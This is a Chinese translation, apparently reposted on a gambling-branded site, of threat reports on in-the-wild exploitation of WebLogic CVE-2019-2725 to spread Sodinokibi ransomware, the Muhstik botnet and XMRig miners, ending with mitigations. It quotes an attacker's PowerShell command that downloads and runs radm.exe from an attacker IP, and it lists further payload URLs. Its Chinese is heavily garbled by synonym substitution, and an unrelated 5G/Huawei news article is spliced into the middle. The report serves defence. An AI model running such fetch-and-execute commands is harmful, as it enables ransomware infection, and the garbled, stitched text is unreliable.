最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725) | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

申博_新闻事件 申博 195次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

一、概述

2019年4月26日,Oracle宣布官方通知布告,修复CVE-2019-2725破绽。该破绽属于Oracle WebLogic Server中的反序列化破绽,可致使长途代码实行。这个破绽无需举行身份验证便可长途应用,因而进击者可以或许在不须要掌握用户名和暗码的前提下,经由历程网络完成对破绽主机的长途代码实行。

4月30日,Cisco Talos团队和Unit 42团队同时宣布文章,监测到补钉宣布前针对该破绽的在野0-day破绽应用。Cisco Talos团队重要发明Sodinokibi讹诈软件应用该破绽完成进击,而Unit 42团队则发明Muhstik僵尸网络应用该破绽举行加密泉币发掘和DDoS进击。由于两份申报存在相似之处,为使人人团体相识CVE-2019-2725破绽的在野破绽应用近况,因而将这两篇申报兼并翻译。

二、破绽影响版本

Oracle WebLogic Server 10.3.6.0和12.1.3.0版本

三、破绽道理及应用要领

该破绽位于wls9_async_response.war包中,该包负责处理WebLogic Server的异步通讯。该顺序包没法运用XML <work:WorkContext>、<wsa:Action>、<wsa:RelatesTo>和<class>符号正确处理SOAP要求,从而使效劳器轻易遭到反序列化破绽的影响。因而,经由特别组织、具有歹意SOAP音讯的HTTP要求可以或许触发该破绽,从而致使在WebLogic效劳器的平安高低文中长途实行代码。下图展现了破绽应用的历程。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

上面援用的PoC,须要确保WebLogic实例上没有修复另一个WebLogic破绽(CVE-2017-10271)能力胜利应用。这一初期破绽许可长途未经身份验证的进击者通报具有恣意内容的Java类对象,从而许可长途实行代码。在2017年的补钉中,对SOAP要求的内容举行了过滤,并设置了黑名单,确保其仅包罗字节属性的类对象,与上图中通报的字符串属性分歧。然则,若是未装置CVE-2019-2725补钉,要挟参与者可以或许轻松修正SOAP要求,以通报够早的字节对象,并猎取代码实行。

CVE-2019-2725的补钉中改进了黑名单机制,在个中包罗了类符号。有关这两个破绽和相干黑名单的更多信息,请点击此处(https://paper.seebug.org/910/)。

之以是将该破绽视为严峻破绽,而且具有9.8的CVSS v3.0评分,取决于多种要素。起首,wls9_async_response.war包默许包罗在普遍运用的WebLogic Server版本中,比方10.3.6和12.1.3。其次,如上所述,跟着WebLogic Server的提高和其逐步在营业症结状况中布置的趋向,为进击者建立了一个具有足够应用状况的目的。别的,要应用此破绽,不须要任何用户交互。未经身份验证的长途用户可以或许发送包罗精心设计的SOAP Payload的HTTP要求,并轻松完成长途代码实行。

四、Sodinokibi讹诈软件的破绽应用体式格局

4.1 破绽应用体式格局

进击者正在主动应用Oracle WebLogic中近来表露的一个破绽来装置一种名为“Sodinokibi”的新型讹诈软件。Sodinokibi实验加密用户目次中的数据,并删除卷影副本备份,从而使得数据规复变得越发难题。Oracle起首在4月26日紧要宣布补钉修复了这一题目,并将该破绽分配了CVE-2019-2725编号。进击者异常轻易应用该破绽,由于任何对WebLogic效劳器具有HTTP接见权限的人都可以或许完成破绽进击。因而,该破绽的CVSS评分为9.8/10。最少自从4月17日以来,进击者就一向在野外应用该破绽完成进击。Cisco的事宜相应(IR)团队和Cisco Talos团队正在主动视察这些进击运动和Sodinokibi歹意软件。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

4.2 歹意运动剖析

讹诈软件进击的末了阶段发作在4月25日,也就是Oracle宣布更新补钉的前一天。他们运用了一个测试效劳器,并测试该破绽是不是可以或许现实应用。

2019年4月25日,举行讹诈软件布置之前的初始运动。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

2019年4月26日,进击者与另一个易受进击的效劳器竖立HTTP衔接,要求Oracle WebLogic Server的AsyncResponderService。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

歹意运动从4月26日最先,进击者下载Sodinokibi讹诈软件。

从历史上来看,大多数讹诈软件都须要某种情势的用户交互,比方:引诱用户翻开电子邮件附件、引诱用户点击歹意链接或在装备上运转歹意软件。但在这类破绽进击场景下,进击者仅仅是应用Oracle WebLogic破绽,致使受破绽影响的效劳器从进击者掌握的IP地点188.166.74[.]218和45.55.211[,]79下载讹诈软件的副本。188.166.74[.]218这个IP地点,同时也托管了与本次讹诈软件进击无关的两个域名,即arg0s-co[.]uk和projectstore[.]guru。前者多是用于网络垂纶的域名,而后者是捏造与PDF相干的Google搜刮效果的网站。别的一个IP地点,45.55.211[.]79,托管两个正当的智利域名,好像该效劳器已被进击者攻下并从新应用。在此次事宜中,进击者胜利对很多用户的体系完成了加密。

Cisco IR效劳和Talos视察到来自130.61.54[.]136的进击要求。在HTTP POST要求中,包罗cmd.exe指令的参数,用于从主机188.166.74[.]218下载名为“radm.exe”的文件,该文件中包罗PowerShell敕令,进击者会在当地生存该文件,然后实行该文件。

cmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe

除“radm.exe”以外,研究人员还在PowerShell和certutil敕令中视察到多个文件名,详细包罗:

· hxxp[:]//188.166.74[.]218/office.exe

· hxxp[:]//188.166.74[.]218/radm.exe

· hxxp[:]//188.166.74[.]218/untitled.exe

· hxxp[:]//45.55.211[.]79/.cache/untitled.exe

我们运用Threat Grid举行剖析,发明沙箱将上述样本辨认为潜伏的讹诈软件。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

VirusTotal网站的71种分歧引擎中,共有43种胜利检测到该文件二进制哈希值属于歹意文件。

接下来,我们可以或许运用“cmd.exe”实行vssadmin.exe实用顺序,从而检察歹意文件“untitled.exe”。这一操纵是讹诈软件的经常使用战略,可以或许防备用户轻松规复他们的数据。该历程会实验删除默许的Windows备份机制,也被称为“卷影副本”,以防备用户从这些备份中规复原始文件。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

随后,讹诈提醒会将受害者指导到Tor网络(洋葱网络)上的.onion网站,或许将受害者指导到在2019年3月31日注册的decryptor[.]top域名。在对受害者计算机运用Sodinokibi举行加密以后,每一个加密的体系都邑涌现分歧的加密文件扩展名。而且,赎金提醒的文件名中还包罗此扩展名作为前缀,比方:88f2947s-HOW-TO-DECRYPT.txt。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

4.3 分发GandCrab歹意软件

在对受害者网络中主机完成Sodinokibi讹诈软件的布置以后,进击者在约莫8小时后又举行了一次分外的CVE-2019-2725破绽应用实验。但是,这一次,进击者挑选分发了GandCrab v5.2。这一行为异常新鲜,进击者居然会挑选在统一目的上分发分外的、分歧的讹诈软件。但考虑到Sodinokibi是一种新型讹诈软件,有多是进击者以为他们新近的实验没有胜利,以是依然愿望经由历程分发GandCrab讹诈软件来取得讹诈的收益。

4.4 小结

布拉格提案假借平安牌封闭华为? 专家:存眷真5G平安

日前,美国联合众多西方国家在布拉格召开5G安全大会,拟定“布拉格提案”。提案直指“网络安全不仅是技术问题,应考虑第三方国家对供应商施加影响的‘总体风险’”,这被舆论视为“美国封锁华为5G”之举。5月6日,外交部发言人耿爽在例行记者会上表示,将政治因素人为引入5G开发,不仅不利于5G的发展,也有悖公平竞争原则。 不久前,华为曾对媒体回应称:网络安全本质上还是技术问题,技术问题要靠技术手段来解决。我们坚信任何未来的安全原则都应以可验证的事实和技术数据为基础,而不是基于供应商的属地和意识形态来进行鉴别。 对于5G安全,来自360的安全专家黄琳也对记者表示,基础通信网络设施中的相关安全问题是一个长期存在的话题,并不是因为5G新引入的。为了5G的发展,呼吁大家关注“真5G安全”——真正属于技术层面的安全问题。 黄琳指出,关键基础设施并不是从5G时代才开始连接网络的。以电力行业为例,目前的电网系统有自己的专网,现在大量在线运行的是2.5G的技术,基于4G的专网正在逐步部署之中。所以,关键基础设施连接无线网络的风险,过去就存在,现在也存在,将来依然存在。 实际上,无论是伊朗核电站震网病毒、乌克兰电网攻击,还是最近的委内瑞拉大停电,

本次进击异常值得存眷,由于进击者应用0-day破绽来完成讹诈软件的分发。此前,我们曾发明过讹诈软件进击者针对未打补钉的体系举行讹诈软件的装置和横向流传,但这类0-day进击要领可以或许在其他完整修复的体系上完成破绽应用。

五、Muhstik僵尸网络的破绽应用

5.1 破绽应用体式格局

2019年4月28日,Unit 42团队发明了Linux僵尸网络Muhstik的新变种。这个新版本应用了五天前方才宣布的最新WebLogic效劳器破绽(CVE-2019-2725),将其本身装置在易受进击的体系上。Oracle在2019年4月26日宣布了针对该破绽的紧要补钉,我们确认该补钉可以或许胜利提防最新版本的Muhstik。

从时候线上来看,我们可以或许看到Muhstik的开发人员正在主动存眷新的Linux效劳破绽进击,并马上接纳了行为,应用它们来完成僵尸顺序的沾染。这一破绽应用是异常有用的,由于新型破绽进击的速率越快,那末在修复破绽之前胜利攻下更多主机的可能性就越大。因而,在僵尸网络的要挟之下,效劳供应商和用户都应该尽快装置补钉,以提防新型破绽。

Muhstik僵尸网络自2018年3月以来就一向存在,而且具有蠕虫般的自我流传功用,可以或许沾染Linux效劳器和物联网装备。在胜利沾染以后,它通常会启动加密泉币发掘软件和DDoS进击,以便为进击者猎取收入。Muhstik运用了多种破绽应用体式格局来沾染分歧的Linux效劳,包罗WebLogic破绽、WordPress破绽和Drupal破绽。在此前,Muhstik已采用了WebLogic破绽应用体式格局(CVE-2017-10271),在将该破绽应用体式格局添加到其东西包以后,可以或许增添其可沾染的体系数目。

5.2 歹意运动剖析

我们从三个新型Muhstik样本中捕捉了CVE-2019-2725的WebLogic破绽应用流量,并运用WildFire Linux剖析器对其举行剖析。破绽应用Payload中仅包罗一个Shell敕令,用于从IP地点165.227.78[.]159下载wl.php。现在,wl.php已没法胜利下载,我们置信它很多是一个PHP WbeShell。

此前被Mushtik僵尸网络运用的IP地点165.227.78[.]159在此次进击运动中作为一个申报效劳器,来网络僵尸主机的信息。但现在,这个IP地点也可以或许作为Payload主机效劳器。

来改过Muhstik样本的破绽应用流量:

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

六、XMRig挖矿歹意软件的破绽应用

6.1 初始视察

在2019年4月25日,我们视察到很多破绽应用实验,下图展现了我们初次监控到的事宜。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

6.2 破绽扫描

自从用于扫描破绽的PoC公然以来,我们已视察到很多歹意要求。我们捕捉了滥用上述PoC的示例,如下图所示。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

6.3 挖矿散布

我们视察到一次破绽应用实验,投放了一个尽人皆知的PowerShell下载顺序剧本,以应用受沾染的主机为进击者发掘加密泉币。该剧本起首从进击者掌握的域名下载XMRig,这是一个开源的门罗币(Monero)发掘东西。然后,它停止任何修复底层WebLogic破绽的正当Oracle更新效劳,如上图所示。随后,它经由历程复制本身,并建立伪装成Oracle更新效劳的计划义务来竖立持久性。

该剧本将停止可能在主机上运转的种种历程。停止的义务包罗反病毒效劳、其他加密泉币发掘东西和其他歹意软件的持久性要领。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

下载顺序的历程将起首停止体系上存在的DDG门罗挖矿僵尸网络客户端,然后是种种其他挖矿东西,包罗其他的XMRig实例。如许的行为是为了防备其他挖矿病毒竞争者斲丧主机资本。该歹意软件还针对奇虎360(反病毒效劳)的效劳举行停止,以下降被检测的可能性。上图展现了剧本须要停止的历程。

末了,该剧本运用Cryptonight算法和进击者的门罗币钱包运转衔接3个挖矿效劳器的XMRig可实行文件,如下图所示。

最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)

七、减缓要领

针对一切WebLogic Server实例,针对此进击的最有用提防步伐是运用最新的平安补钉修复WebLogic Server实例。但在Oracle宣布补钉之前,还提出了另一种减缓步伐,即删除wls9_async_response.war包,或限定对包罗/_async/*和/wls-wsat/*的URL的接见。

八、提防步伐

由于Oracle WebLogic效劳器数目浩瀚,而且该破绽异常轻易应用,因而我们估计,会发作针对CVE-2019-2725的普遍进击运动,因而我们发起接纳提防步伐。依据现实状况,依照分层掌握的准绳,接纳一种或多种的提防步伐,便可阻挠此类进击,这些详细步伐包罗:

1. 马上装置WebLogic的CVE-2019-2725补钉。

2. 纪录并集合网络Web、应用顺序和操纵体系事宜。

3. 限定用于运转WebLogic历程的帐户的接见权限。

4. 监控被该要挟进击的特性:

(1) 监控数据中心体系出口的网络通讯;

(2) 查找讹诈软件“Canary”文件、阻挠并辨认Muhstik歹意软件;

(3) 监控到新URI的外部HTTP POST要求;

(4) 监控WebShell;

(5) 监控效劳或体系帐户的不测运动(针对WebLogic用户)。

5. 举行破绽扫描,掌握现实破绽状况并接纳减缓步伐。

6. 限定数据中心出口流量通讯。

7. 掌握URL接见,特别是外部对“/_async/*”和“/wls-wsat/*”的接见。

8. 布置容灾规复计划,保护并测试数据备份与规复机制。

9. 设置装备摆设PowerShell剧本,仅实行署名剧本。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明最新WebLogic长途代码实行破绽在野应用剖析:流传讹诈软件、挖矿和发起DDoS进击(CVE-2019-2725)
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址